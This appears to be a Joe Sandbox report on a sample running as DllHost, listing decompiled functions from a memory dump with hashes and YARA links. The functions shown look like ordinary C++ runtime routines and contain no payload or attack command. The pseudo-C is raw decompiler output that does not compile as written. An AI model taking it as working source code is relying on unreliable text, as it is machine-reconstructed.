                                                                                                                                                              0x7ff7191d6d99
                                                                                                                                                              0x7ff7191d6d9e
                                                                                                                                                              0x7ff7191d6da4
                                                                                                                                                              0x7ff7191d6dae
                                                                                                                                                              0x7ff7191d6db3
                                                                                                                                                              0x7ff7191d6db8
                                                                                                                                                              0x7ff7191d6dc2
                                                                                                                                                              0x7ff7191d6dcb
                                                                                                                                                              0x7ff7191d6e01
                                                                                                                                                              0x7ff7191d6e0e
                                                                                                                                                              0x7ff7191d6e18
                                                                                                                                                              0x7ff7191d6e21
                                                                                                                                                              0x7ff7191d6e2a
                                                                                                                                                              0x7ff7191d6e2d
                                                                                                                                                              0x7ff7191d6e32
                                                                                                                                                              0x7ff7191d6e38
                                                                                                                                                              0x7ff7191d6e41
                                                                                                                                                              0x7ff7191d6e68
                                                                                                                                                              0x7ff7191d6e6d
                                                                                                                                                              0x7ff7191d6e73
                                                                                                                                                              0x7ff7191d6e7c
                                                                                                                                                              0x7ff7191d6e81
                                                                                                                                                              0x7ff7191d6e89
                                                                                                                                                              0x7ff7191d6e8b
                                                                                                                                                              0x7ff7191d6e93
                                                                                                                                                              0x7ff7191d6ec3
                                                                                                                                                              0x7ff7191d6ecd
                                                                                                                                                              0x7ff7191d6ed8
                                                                                                                                                              0x7ff7191d6edd
                                                                                                                                                              0x7ff7191d6eee
                                                                                                                                                              0x7ff7191d6ef7
                                                                                                                                                              0x7ff7191d6efc
                                                                                                                                                              0x7ff7191d6f08
                                                                                                                                                              0x7ff7191d6f0e
                                                                                                                                                              0x7ff7191d6f17
                                                                                                                                                              0x7ff7191d6f19
                                                                                                                                                              0x7ff7191d6f20
                                                                                                                                                              0x7ff7191d6f22
                                                                                                                                                              0x7ff7191d6f35
                                                                                                                                                              0x7ff7191d6f42
                                                                                                                                                              0x7ff7191d6f54
                                                                                                                                                              0x7ff7191d6f63
                                                                                                                                                              0x7ff7191d6f6a
                                                                                                                                                              0x7ff7191d6f6f
                                                                                                                                                              0x7ff7191d6f75
                                                                                                                                                              0x7ff7191d6f82
                                                                                                                                                              0x7ff7191d6f94
                                                                                                                                                              0x7ff7191d6fa2
                                                                                                                                                              0x7ff7191d6fa6
                                                                                                                                                              0x7ff7191d6fab
                                                                                                                                                              0x7ff7191d6fd1

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __except_validate_context_record
                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                              • API String ID: 1467352782-3733052814
                                                                                                                                                              • Opcode ID: 811ad17a60e8fd7c9130e195e7a39a578938059862f85b2d73f6e8f098065cfc
                                                                                                                                                              • Instruction ID: d3c7557be5d197185808e74b28787784a6ef5bfbd6052f3262fa6729eaa60a49
                                                                                                                                                              • Opcode Fuzzy Hash: 811ad17a60e8fd7c9130e195e7a39a578938059862f85b2d73f6e8f098065cfc
                                                                                                                                                              • Instruction Fuzzy Hash: A871BF72508E8186FB20AF25E058679FBF0FB04BEDF548531DA8C47A89CB2CD49AD751
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C0570 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00007FF77FF7191C0570(long long* __rcx, void* __rdx, long long __rdi, void* __r9, long long __r12, long long __r13) {
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t54;
				long long _t55;
				long long _t62;
				signed long long _t67;
				unsigned long long _t80;
				long long _t90;
				long long* _t92;
				long long _t93;
				unsigned long long _t94;
				void* _t96;
				signed long long _t104;
				intOrPtr _t109;
				void* _t110;

				_t109 =  *((intOrPtr*)(__rcx + 0x10));
				_t92 = __rcx;
				if (0xffffffff - _t109 - __rdx < 0) goto 0x191c071a;
				 *((long long*)(_t96 + 0x58)) = _t93;
				_t94 =  *((intOrPtr*)(__rcx + 0x18));
				 *((long long*)(_t96 + 0x60)) = __rdi;
				 *((long long*)(_t96 + 0x68)) = __r12;
				_t104 = _t109 + __rdx;
				 *((long long*)(_t96 + 0x20)) = __r13;
				_t67 = _t104 | 0x0000000f;
				if (_t67 - 0xffffffff > 0) goto 0x191c0600;
				_t80 = _t94 >> 1;
				if (_t94 - 0xffffffff - _t80 > 0) goto 0x191c0600;
				_t54 = _t80 + _t94;
				_t9 = ( <  ? _t54 : _t67) + 1; // 0x1
				_t55 = _t9;
				if (_t55 - 0x1000 < 0) goto 0x191c0626;
				_t10 = _t55 + 0x27; // 0x28
				if (_t10 - _t55 <= 0) goto 0x191c0714;
				goto 0x191c060a;
				E00007FF77FF7191D23D8(_t55, 0x27);
				if (_t55 == 0) goto 0x191c070e;
				_t11 = _t55 + 0x27; // 0x27
				 *((long long*)((_t11 & 0xffffffe0) - 8)) = _t55;
				goto 0x191c063a;
				if (_t55 == 0) goto 0x191c0638;
				_t33 = E00007FF77FF7191D23D8(_t55, _t55);
				_t90 = _t55;
				goto 0x191c063a;
				r13d =  *((char*)(_t96 + 0x78));
				_t110 = _t109 - __r9;
				 *((long long*)(_t92 + 0x18)) =  <  ? _t54 : _t67;
				 *(_t92 + 0x10) = _t104;
				_t105 = _t90 + __r9;
				_t17 = _t110 + 1; // 0x1
				 *((long long*)(_t96 + 0x50)) = _t17;
				if (_t94 - 0x10 < 0) goto 0x191c06c3;
				_t62 =  *_t92;
				E00007FF77FF7191D4380();
				_t34 = E00007FF77FF7191D4A30(_t33, r13d, _t90 + __r9, _t62,  *((intOrPtr*)(_t96 + 0x70)));
				E00007FF77FF7191D4380();
				_t23 = _t94 + 1; // 0x11
				if (_t23 - 0x1000 < 0) goto 0x191c06b9;
				_t25 = _t62 -  *((intOrPtr*)(_t62 - 8)) - 8; // -7
				if (_t25 - 0x1f > 0) goto 0x191c070e;
				0x191d23d0();
				goto 0x191c06e9;
				E00007FF77FF7191D4380();
				_t35 = E00007FF77FF7191D4A30(_t34, r13d, _t105, _t92,  *((intOrPtr*)(_t96 + 0x70)));
				E00007FF77FF7191D4380();
				 *_t92 = _t90;
				return _t35;
			}



















                                                                                                                                                              0x7ff7191c057b
                                                                                                                                                              0x7ff7191c0592
                                                                                                                                                              0x7ff7191c0598
                                                                                                                                                              0x7ff7191c059e
                                                                                                                                                              0x7ff7191c05a3
                                                                                                                                                              0x7ff7191c05a7
                                                                                                                                                              0x7ff7191c05ac
                                                                                                                                                              0x7ff7191c05b1
                                                                                                                                                              0x7ff7191c05b8
                                                                                                                                                              0x7ff7191c05bd
                                                                                                                                                              0x7ff7191c05c4
                                                                                                                                                              0x7ff7191c05cc
                                                                                                                                                              0x7ff7191c05d5
                                                                                                                                                              0x7ff7191c05d7
                                                                                                                                                              0x7ff7191c05e5
                                                                                                                                                              0x7ff7191c05e5
                                                                                                                                                              0x7ff7191c05ef
                                                                                                                                                              0x7ff7191c05f1
                                                                                                                                                              0x7ff7191c05f8
                                                                                                                                                              0x7ff7191c05fe
                                                                                                                                                              0x7ff7191c060a
                                                                                                                                                              0x7ff7191c0612
                                                                                                                                                              0x7ff7191c0618
                                                                                                                                                              0x7ff7191c0620
                                                                                                                                                              0x7ff7191c0624
                                                                                                                                                              0x7ff7191c0629
                                                                                                                                                              0x7ff7191c062e
                                                                                                                                                              0x7ff7191c0633
                                                                                                                                                              0x7ff7191c0636
                                                                                                                                                              0x7ff7191c063a
                                                                                                                                                              0x7ff7191c0640
                                                                                                                                                              0x7ff7191c0643
                                                                                                                                                              0x7ff7191c064a
                                                                                                                                                              0x7ff7191c064e
                                                                                                                                                              0x7ff7191c0655
                                                                                                                                                              0x7ff7191c065e
                                                                                                                                                              0x7ff7191c0667
                                                                                                                                                              0x7ff7191c0669
                                                                                                                                                              0x7ff7191c066f
                                                                                                                                                              0x7ff7191c067d
                                                                                                                                                              0x7ff7191c068f
                                                                                                                                                              0x7ff7191c0694
                                                                                                                                                              0x7ff7191c069f
                                                                                                                                                              0x7ff7191c06ac
                                                                                                                                                              0x7ff7191c06b4
                                                                                                                                                              0x7ff7191c06bc
                                                                                                                                                              0x7ff7191c06c1
                                                                                                                                                              0x7ff7191c06c6
                                                                                                                                                              0x7ff7191c06d4
                                                                                                                                                              0x7ff7191c06e4
                                                                                                                                                              0x7ff7191c06e9
                                                                                                                                                              0x7ff7191c070d

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: ios_base::badbit set
                                                                                                                                                              • API String ID: 73155330-3882152299
                                                                                                                                                              • Opcode ID: d26566c6f1d16e739c14c48d41f04a5a316c5680fff806e267f2ab7b50a3e20f
                                                                                                                                                              • Instruction ID: 6394fbd0def69ce2d6b0e8bd11c0fa600a7491499a8922e2d0feb504e4bc7ada
                                                                                                                                                              • Opcode Fuzzy Hash: d26566c6f1d16e739c14c48d41f04a5a316c5680fff806e267f2ab7b50a3e20f
                                                                                                                                                              • Instruction Fuzzy Hash: 00418E22719B5195FE04AF16B0081A9E3B5FB45BE8FD40631EA5D077D5DE7CE08AE320
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D7374 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                              			E00007FF77FF7191D7374(void* __eflags, void* __rcx, intOrPtr _a8, intOrPtr _a16, signed int _a24, void* _a32) {
				char _v80;
				signed long long _v96;
				long long _v104;
				long long _v136;
				signed long long _v144;
				signed int _v152;
				long long _v160;
				long long _v168;
				signed long long _v176;
				signed int _v184;
				void* __rbx;
				void* _t105;
				void* _t124;
				long long _t125;
				signed long long _t129;
				signed int _t130;
				long long _t132;
				signed long long _t134;
				long long _t153;
				intOrPtr* _t154;
				void* _t155;
				void* _t158;
				signed long long _t161;

				_t124 = _t155;
				r12d = 0;
				_v184 = r12d;
				_a24 = _a24 & r12d;
				_v176 = _v176 & _t161;
				_v152 = _v152 & _t161;
				 *((intOrPtr*)(_t124 - 0x80)) = r12b;
				 *(_t124 - 0x7c) =  *(_t124 - 0x7c) & r12d;
				 *(_t124 - 0x78) =  *(_t124 - 0x78) & r12d;
				 *(_t124 - 0x74) =  *(_t124 - 0x74) & r12d;
				 *(_t124 - 0x70) =  *(_t124 - 0x70) & r12d;
				 *(_t124 - 0x6c) =  *(_t124 - 0x6c) & r12d;
				E00007FF77FF7191D4EF8(_t124);
				_t125 =  *((intOrPtr*)(_t124 + 0x28));
				_v160 = _t125;
				E00007FF77FF7191D4EF8(_t125);
				_v168 =  *((intOrPtr*)(_t125 + 0x20));
				_t153 =  *((intOrPtr*)(__rcx + 0x50));
				_a32 = _t153;
				_t132 =  *((intOrPtr*)(__rcx + 0x40));
				_v136 =  *((intOrPtr*)(__rcx + 0x30));
				_v104 =  *((intOrPtr*)(__rcx + 0x48));
				_t129 =  *((intOrPtr*)(__rcx + 0x68));
				_v96 = _t129;
				_a16 =  *((intOrPtr*)(__rcx + 0x78));
				_a8 =  *((intOrPtr*)(__rcx + 0x38));
				E00007FF77FF7191D8194( *((intOrPtr*)(__rcx + 0x38)), _t132);
				E00007FF77FF7191D4EF8(_t129);
				 *((long long*)(_t129 + 0x20)) = _t153;
				E00007FF77FF7191D4EF8(_t129);
				 *((long long*)(_t129 + 0x28)) = _t132;
				E00007FF77FF7191D4EF8(_t129);
				E00007FF77FF7191D3D58(_t129,  &_v80,  *((intOrPtr*)( *((intOrPtr*)(_t129 + 0x20)) + 0x28)));
				_v144 = _t129;
				if ( *((intOrPtr*)(__rcx + 0x58)) == _t161) goto 0x191d7476;
				_a24 = 1;
				E00007FF77FF7191D4EF8(_t129);
				_v152 =  *((intOrPtr*)(_t129 + 0x70));
				r8d = 0x100;
				E00007FF77FF7191D8510(_v136,  *((intOrPtr*)(__rcx + 0x28)), _t158);
				_v176 = _t129;
				if (_t129 - 2 >= 0) goto 0x191d74aa;
				_t134 =  *((intOrPtr*)(_t155 - 0xa8 + 0x70 + _t129 * 8));
				if (_t134 == 0) goto 0x191d75bd;
				_v176 = _t134;
				E00007FF77FF7191D8540(_t134,  *((intOrPtr*)(__rcx + 0x28)));
				_v184 = 1;
				E00007FF77FF7191D4EF8(_t129);
				 *(_t129 + 0x40) =  *(_t129 + 0x40) & 0x00000000;
				E00007FF77FF7191D4EF8(_t129);
				 *((intOrPtr*)(_t129 + 0x78)) = _a16;
				_t154 = _a32;
				if (_a24 == 0) goto 0x191d7511;
				E00007FF77FF7191D4068(1, _t154);
				_t130 = _v152;
				r8d =  *((intOrPtr*)(_t130 + 0x18));
				goto 0x191d751e;
				r8d =  *((intOrPtr*)(_t154 + 0x18));
				RaiseException(??, ??, ??, ??);
				r12d = _v184;
				E00007FF77FF7191D3D94(_t130, _v176, _v144);
				if (r12d != 0) goto 0x191d757c;
				if ( *_t154 != 0xe06d7363) goto 0x191d757c;
				if ( *((intOrPtr*)(_t154 + 0x18)) != 4) goto 0x191d757c;
				if ( *((intOrPtr*)(_t154 + 0x20)) - 0x19930520 - 2 > 0) goto 0x191d757c;
				if (E00007FF77FF7191D40DC(_t130,  *((intOrPtr*)(_t154 + 0x28))) == 0) goto 0x191d757c;
				E00007FF77FF7191D4068(1, _t154);
				E00007FF77FF7191D4EF8(_t130);
				 *((long long*)(_t130 + 0x20)) = _v168;
				E00007FF77FF7191D4EF8(_t130);
				 *((long long*)(_t130 + 0x28)) = _v160;
				E00007FF77FF7191D4EF8(_t130);
				 *((intOrPtr*)(_t130 + 0x78)) = _a8;
				_t105 = E00007FF77FF7191D4EF8(_t130);
				 *((intOrPtr*)(_t130 + 0x78)) = 0xfffffffe;
				return _t105;
			}


























                                                                                                                                                              0x7ff7191d7374
                                                                                                                                                              0x7ff7191d738a
                                                                                                                                                              0x7ff7191d738d
                                                                                                                                                              0x7ff7191d7392
                                                                                                                                                              0x7ff7191d739a
                                                                                                                                                              0x7ff7191d739f
                                                                                                                                                              0x7ff7191d73a4
                                                                                                                                                              0x7ff7191d73a8
                                                                                                                                                              0x7ff7191d73ac
                                                                                                                                                              0x7ff7191d73b0
                                                                                                                                                              0x7ff7191d73b4
                                                                                                                                                              0x7ff7191d73b8
                                                                                                                                                              0x7ff7191d73bc
                                                                                                                                                              0x7ff7191d73c1
                                                                                                                                                              0x7ff7191d73c5
                                                                                                                                                              0x7ff7191d73ca
                                                                                                                                                              0x7ff7191d73d3
                                                                                                                                                              0x7ff7191d73d8
                                                                                                                                                              0x7ff7191d73dc
                                                                                                                                                              0x7ff7191d73e4
                                                                                                                                                              0x7ff7191d73ec
                                                                                                                                                              0x7ff7191d73f9
                                                                                                                                                              0x7ff7191d73fe
                                                                                                                                                              0x7ff7191d7402
                                                                                                                                                              0x7ff7191d740a
                                                                                                                                                              0x7ff7191d7414
                                                                                                                                                              0x7ff7191d741e
                                                                                                                                                              0x7ff7191d7423
                                                                                                                                                              0x7ff7191d7428
                                                                                                                                                              0x7ff7191d742c
                                                                                                                                                              0x7ff7191d7431
                                                                                                                                                              0x7ff7191d7435
                                                                                                                                                              0x7ff7191d744a
                                                                                                                                                              0x7ff7191d7452
                                                                                                                                                              0x7ff7191d745b
                                                                                                                                                              0x7ff7191d745d
                                                                                                                                                              0x7ff7191d7468
                                                                                                                                                              0x7ff7191d7471
                                                                                                                                                              0x7ff7191d7476
                                                                                                                                                              0x7ff7191d7484
                                                                                                                                                              0x7ff7191d748c
                                                                                                                                                              0x7ff7191d7495
                                                                                                                                                              0x7ff7191d7497
                                                                                                                                                              0x7ff7191d749f
                                                                                                                                                              0x7ff7191d74a5
                                                                                                                                                              0x7ff7191d74b0
                                                                                                                                                              0x7ff7191d74c1
                                                                                                                                                              0x7ff7191d74c9
                                                                                                                                                              0x7ff7191d74ce
                                                                                                                                                              0x7ff7191d74d2
                                                                                                                                                              0x7ff7191d74de
                                                                                                                                                              0x7ff7191d74e1
                                                                                                                                                              0x7ff7191d74f1
                                                                                                                                                              0x7ff7191d74f8
                                                                                                                                                              0x7ff7191d74fd
                                                                                                                                                              0x7ff7191d7506
                                                                                                                                                              0x7ff7191d750f
                                                                                                                                                              0x7ff7191d7515
                                                                                                                                                              0x7ff7191d751e
                                                                                                                                                              0x7ff7191d7524
                                                                                                                                                              0x7ff7191d7540
                                                                                                                                                              0x7ff7191d7548
                                                                                                                                                              0x7ff7191d7550
                                                                                                                                                              0x7ff7191d7556
                                                                                                                                                              0x7ff7191d7563
                                                                                                                                                              0x7ff7191d7570
                                                                                                                                                              0x7ff7191d7577
                                                                                                                                                              0x7ff7191d757c
                                                                                                                                                              0x7ff7191d7581
                                                                                                                                                              0x7ff7191d7585
                                                                                                                                                              0x7ff7191d758a
                                                                                                                                                              0x7ff7191d758e
                                                                                                                                                              0x7ff7191d759a
                                                                                                                                                              0x7ff7191d759d
                                                                                                                                                              0x7ff7191d75a2
                                                                                                                                                              0x7ff7191d75bc

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                              • String ID: csm
                                                                                                                                                              • API String ID: 2558813199-1018135373
                                                                                                                                                              • Opcode ID: f531fd8db54d7f26c50867f4d1352bdcc019f59113a138ae86e2e14a3ef0ac7f
                                                                                                                                                              • Instruction ID: d7c2ddefc4d0cbdad7bad188c8f024c793563d5c3ad35f9aae910f59da6af95b
                                                                                                                                                              • Opcode Fuzzy Hash: f531fd8db54d7f26c50867f4d1352bdcc019f59113a138ae86e2e14a3ef0ac7f
                                                                                                                                                              • Instruction Fuzzy Hash: 27517C73608A8196E620AF15B4482ADB7F4F789BA4F900134DB8D07B95CF3CD096DB11
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191BCA80 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E00007FF77FF7191BCA80(long long* __rcx, void* __rdx, long long __rdi, void* __r9, long long __r14, long long __r15) {
				void* _t26;
				long long _t45;
				long long _t50;
				signed long long _t56;
				void* _t59;
				long long _t60;
				unsigned long long _t68;
				long long _t78;
				long long* _t80;
				long long _t81;
				unsigned long long _t82;
				void* _t84;
				intOrPtr _t89;
				signed long long _t92;
				void* _t93;
				intOrPtr _t96;

				_t89 =  *((intOrPtr*)(__rcx + 0x10));
				_t80 = __rcx;
				if (0xffffffff - _t89 - __rdx < 0) goto 0x191bcc00;
				 *((long long*)(_t84 + 0x70)) = _t81;
				_t82 =  *((intOrPtr*)(__rcx + 0x18));
				 *((long long*)(_t84 + 0x28)) = __r14;
				_t92 = __rdx + _t89;
				_t56 = _t92 | 0x0000000f;
				if (_t56 - 0xffffffff > 0) goto 0x191bcaeb;
				_t68 = _t82 >> 1;
				if (_t82 - 0xffffffff - _t68 > 0) goto 0x191bcaeb;
				_t50 =  <  ? _t68 + _t82 : _t56;
				 *((long long*)(_t84 + 0x30)) = __rdi;
				 *((long long*)(_t84 + 0x20)) = __r15;
				_t59 =  <  ? 0xffffffff : _t50 + 1;
				if (_t59 - 0x1000 < 0) goto 0x191bcb3c;
				_t9 = _t59 + 0x27; // 0x8000000000000025
				_t45 = _t9;
				if (_t45 - _t59 <= 0) goto 0x191bcc06;
				_t60 = _t45;
				E00007FF77FF7191D23D8(_t45, _t60);
				if (_t45 == 0) goto 0x191bcbfa;
				_t10 = _t45 + 0x27; // 0x27
				 *((long long*)((_t10 & 0xffffffe0) - 8)) = _t45;
				goto 0x191bcb4d;
				if (_t60 == 0) goto 0x191bcb4b;
				_t26 = E00007FF77FF7191D23D8(_t45, _t60);
				_t78 = _t45;
				goto 0x191bcb4d;
				_t96 =  *((intOrPtr*)(_t84 + 0x80));
				 *(_t80 + 0x10) = _t92;
				_t93 = _t78 + _t89;
				 *((long long*)(_t80 + 0x18)) = _t50;
				if (_t82 - 0x10 < 0) goto 0x191bcbba;
				_t51 =  *_t80;
				E00007FF77FF7191D4380();
				E00007FF77FF7191D4380();
				 *((char*)(_t93 + _t96)) = 0;
				if (_t82 + 1 - 0x1000 < 0) goto 0x191bcbb0;
				_t19 =  *_t80 -  *((intOrPtr*)(_t51 - 8)) - 8; // 0x7ffffffffffffff7
				if (_t19 - 0x1f > 0) goto 0x191bcbfa;
				0x191d23d0();
				goto 0x191bcbd5;
				E00007FF77FF7191D4380();
				E00007FF77FF7191D4380();
				 *((char*)(_t93 + _t96)) = 0;
				 *_t80 = _t78;
				return _t26;
			}



















                                                                                                                                                              0x7ff7191bca8b
                                                                                                                                                              0x7ff7191bcaa2
                                                                                                                                                              0x7ff7191bcaa8
                                                                                                                                                              0x7ff7191bcaae
                                                                                                                                                              0x7ff7191bcab3
                                                                                                                                                              0x7ff7191bcab7
                                                                                                                                                              0x7ff7191bcabc
                                                                                                                                                              0x7ff7191bcac3
                                                                                                                                                              0x7ff7191bcaca
                                                                                                                                                              0x7ff7191bcad2
                                                                                                                                                              0x7ff7191bcadb
                                                                                                                                                              0x7ff7191bcae7
                                                                                                                                                              0x7ff7191bcaee
                                                                                                                                                              0x7ff7191bcaf7
                                                                                                                                                              0x7ff7191bcb03
                                                                                                                                                              0x7ff7191bcb0e
                                                                                                                                                              0x7ff7191bcb10
                                                                                                                                                              0x7ff7191bcb10
                                                                                                                                                              0x7ff7191bcb17
                                                                                                                                                              0x7ff7191bcb1d
                                                                                                                                                              0x7ff7191bcb20
                                                                                                                                                              0x7ff7191bcb28
                                                                                                                                                              0x7ff7191bcb2e
                                                                                                                                                              0x7ff7191bcb36
                                                                                                                                                              0x7ff7191bcb3a
                                                                                                                                                              0x7ff7191bcb3f
                                                                                                                                                              0x7ff7191bcb41
                                                                                                                                                              0x7ff7191bcb46
                                                                                                                                                              0x7ff7191bcb49
                                                                                                                                                              0x7ff7191bcb4d
                                                                                                                                                              0x7ff7191bcb58
                                                                                                                                                              0x7ff7191bcb5c
                                                                                                                                                              0x7ff7191bcb60
                                                                                                                                                              0x7ff7191bcb6b
                                                                                                                                                              0x7ff7191bcb6d
                                                                                                                                                              0x7ff7191bcb73
                                                                                                                                                              0x7ff7191bcb81
                                                                                                                                                              0x7ff7191bcb8a
                                                                                                                                                              0x7ff7191bcb96
                                                                                                                                                              0x7ff7191bcba3
                                                                                                                                                              0x7ff7191bcbab
                                                                                                                                                              0x7ff7191bcbb3
                                                                                                                                                              0x7ff7191bcbb8
                                                                                                                                                              0x7ff7191bcbbd
                                                                                                                                                              0x7ff7191bcbcb
                                                                                                                                                              0x7ff7191bcbd0
                                                                                                                                                              0x7ff7191bcbd5
                                                                                                                                                              0x7ff7191bcbf9

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: 123
                                                                                                                                                              • API String ID: 73155330-2286445522
                                                                                                                                                              • Opcode ID: 755dd462280b89e0c07407742a3ec4b442c8c1b61e15db2f62257ccd79971a2c
                                                                                                                                                              • Instruction ID: eed8e51f538650b4fe57f0c8703429fea065ce822cf424ab61bd0a06a9d17911
                                                                                                                                                              • Opcode Fuzzy Hash: 755dd462280b89e0c07407742a3ec4b442c8c1b61e15db2f62257ccd79971a2c
                                                                                                                                                              • Instruction Fuzzy Hash: 0041C662B09A4245FE14BF19B5142ADE276BF04BF8F944631DE6E077C5CE3CD186A314
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C8330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateFileHandle
                                                                                                                                                              • String ID: .z%02d
                                                                                                                                                              • API String ID: 3498533004-724465191
                                                                                                                                                              • Opcode ID: a40fa0fcb9566ec3c3a4f30d170b02f5a0c0141b78bc9bdd282b9f4ec44d2229
                                                                                                                                                              • Instruction ID: e9b7690fbea07f50327a589a4d5259e55e6a58a8358915954994ed9d2400f82b
                                                                                                                                                              • Opcode Fuzzy Hash: a40fa0fcb9566ec3c3a4f30d170b02f5a0c0141b78bc9bdd282b9f4ec44d2229
                                                                                                                                                              • Instruction Fuzzy Hash: 3C41C131A18B4286FA21AF11B444379E3B5EB80BB8F850135DF5E07BD5DE3CE48A9360
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191BB740 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00007FF77FF7191BB740(long long __rbx, long long __rcx, long long __rdx, long long __rdi, long long __rbp, void* __r8, long long _a16) {
				long long _v32;
				long long _v40;
				long long _v56;
				void* _t25;
				intOrPtr _t26;
				long long _t43;
				void* _t56;
				long long _t57;
				long long _t65;
				long long* _t67;
				signed long long _t69;
				intOrPtr _t75;

				_t75 =  *((intOrPtr*)(__r8 + 0x10));
				_t67 = __rcx;
				_v56 = __rcx;
				if (0xffffffff - 0xf < 0) goto 0x191bb88a;
				_a16 = __rbx;
